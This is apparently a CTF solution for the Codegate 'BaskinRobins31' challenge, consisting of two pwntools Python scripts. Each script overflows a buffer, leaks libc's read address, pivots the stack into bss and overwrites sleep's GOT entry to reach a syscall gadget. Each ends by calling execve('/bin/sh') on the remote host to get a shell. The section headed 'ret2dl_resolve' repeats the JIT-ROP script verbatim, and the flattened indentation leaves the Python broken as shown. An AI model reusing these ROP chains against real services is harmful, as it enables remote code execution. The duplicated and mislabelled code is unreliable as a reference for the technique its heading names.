Rating: 0

# JIT-ROP
```python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = 'info'
context.terminal = ['tmux', 'splitw', '-h']

RHOST = "ch41l3ng3s.codegate.kr"
RPORT = 3131
LHOST = "127.0.0.1"
LPORT = 4444
BINARY = 'BaskinRobins31'
elf = ELF(BINARY)

conn = None
if len(sys.argv) > 1:
if sys.argv[1] == 'r':
conn = remote(RHOST, RPORT)
elif sys.argv[1] == 'l':
conn = remote(LHOST, LPORT)
elif sys.argv[1] == 'a':
conn = remote(LHOST, LPORT)
f = open("cmd", "r")
time.sleep(0.5)
pid = proc.pid_by_name(BINARY)
gdb.attach(pid[0], f)
elif sys.argv[1] == 'd':
gdb_cmd = """
b * your_turn + 214
c
"""
conn = gdb.debug([BINARY], gdb_cmd)
else:
conn = process([BINARY])

#-----------START EXPLOIT CODE-----------#
deadbeef = 0xdeadbeefdeadbeef
bss_stack = elf.bss() + 0x400
bss_str = elf.bss() + 0x800
read_plt = elf.plt[b'read']
write_plt = elf.plt[b'write']
puts_plt = elf.plt[b'puts']
sleep_plt = elf.plt[b'sleep']

read_got = elf.got[b'read']
sleep_got = elf.got[b'sleep']
pop3 = 0x0040087a # 0x0040087a: pop rdi ; pop rsi ; pop rdx ; ret ;
leave_ret = 0x00400979 #: leave ; ret ;

leak_size = 0x100

# leak read_addr
payload = b'A' * (0xb0)
payload += p64(bss_stack)
payload += p64(pop3)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

# stack pivot
payload += p64(pop3)
payload += p64(0)
payload += p64(bss_stack)
payload += p64(0x200)
payload += p64(read_plt)
payload += p64(leave_ret)

conn.sendafter('take ? (1-3)', payload)
conn.recvuntil(b"Don't break the rules...:( \n")
read_addr = u64(conn.recv(8))

# leak read binary
payload2 = b'A' * 8
payload2 += p64(pop3)
payload2 += p64(1)
payload2 += p64(read_addr)
payload2 += p64(leak_size)
payload2 += p64(write_plt)

# got overwrite sleep -> syscall
payload2 += p64(pop3)
payload2 += p64(0)
payload2 += p64(sleep_got)
payload2 += p64(0x8)
payload2 += p64(read_plt)

# binsh & *binsh to bss
payload2 += p64(pop3)
payload2 += p64(0)
payload2 += p64(bss_str)
payload2 += p64(59) # systemcall num 59 == execve
payload2 += p64(read_plt)

# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
payload2 += p64(pop3)
payload2 += p64(bss_str)
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(sleep_plt)
payload2 += b'A' * (0x200 - len(payload2))

conn.send(payload2)
read_binary = conn.recv()
syscall_addr = read_addr + read_binary.index(b'\x0f') # find syscall byte
conn.send(p64(syscall_addr))
binsh = b'/bin/sh\x00'
binsh += b'A' * (59 - len(binsh))
conn.send(binsh)
conn.interactive()
```

# ret2dl_resolve

```python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = 'info'
context.terminal = ['tmux', 'splitw', '-h']

RHOST = "ch41l3ng3s.codegate.kr"
RPORT = 3131
LHOST = "127.0.0.1"
LPORT = 4444
BINARY = 'BaskinRobins31'
elf = ELF(BINARY)

conn = None
if len(sys.argv) > 1:
if sys.argv[1] == 'r':
conn = remote(RHOST, RPORT)
elif sys.argv[1] == 'l':
conn = remote(LHOST, LPORT)
elif sys.argv[1] == 'a':
conn = remote(LHOST, LPORT)
f = open("cmd", "r")
time.sleep(0.5)
pid = proc.pid_by_name(BINARY)
gdb.attach(pid[0], f)
elif sys.argv[1] == 'd':
gdb_cmd = """
b * your_turn + 214
c
"""
conn = gdb.debug([BINARY], gdb_cmd)
else:
conn = process([BINARY])

#-----------START EXPLOIT CODE-----------#
deadbeef = 0xdeadbeefdeadbeef
bss_stack = elf.bss() + 0x400
bss_str = elf.bss() + 0x800
read_plt = elf.plt[b'read']
write_plt = elf.plt[b'write']
puts_plt = elf.plt[b'puts']
sleep_plt = elf.plt[b'sleep']

read_got = elf.got[b'read']
sleep_got = elf.got[b'sleep']
pop3 = 0x0040087a # 0x0040087a: pop rdi ; pop rsi ; pop rdx ; ret ;
leave_ret = 0x00400979 #: leave ; ret ;

leak_size = 0x100

# leak read_addr
payload = b'A' * (0xb0)
payload += p64(bss_stack)
payload += p64(pop3)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

# stack pivot
payload += p64(pop3)
payload += p64(0)
payload += p64(bss_stack)
payload += p64(0x200)
payload += p64(read_plt)
payload += p64(leave_ret)

conn.sendafter('take ? (1-3)', payload)
conn.recvuntil(b"Don't break the rules...:( \n")
read_addr = u64(conn.recv(8))

# leak read binary
payload2 = b'A' * 8
payload2 += p64(pop3)
payload2 += p64(1)
payload2 += p64(read_addr)
payload2 += p64(leak_size)
payload2 += p64(write_plt)

# got overwrite sleep -> syscall
payload2 += p64(pop3)
payload2 += p64(0)
payload2 += p64(sleep_got)
payload2 += p64(0x8)
payload2 += p64(read_plt)

# binsh & *binsh to bss
payload2 += p64(pop3)
payload2 += p64(0)
payload2 += p64(bss_str)
payload2 += p64(59) # systemcall num 59 == execve
payload2 += p64(read_plt)

# execve("/bin/sh", {"/bin/sh", NULL}, NULL)
payload2 += p64(pop3)
payload2 += p64(bss_str)
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(sleep_plt)
payload2 += b'A' * (0x200 - len(payload2))

conn.send(payload2)
read_binary = conn.recv()
syscall_addr = read_addr + read_binary.index(b'\x0f') # find syscall byte
conn.send(p64(syscall_addr))
binsh = b'/bin/sh\x00'
binsh += b'A' * (59 - len(binsh))
conn.send(binsh)
conn.interactive()
```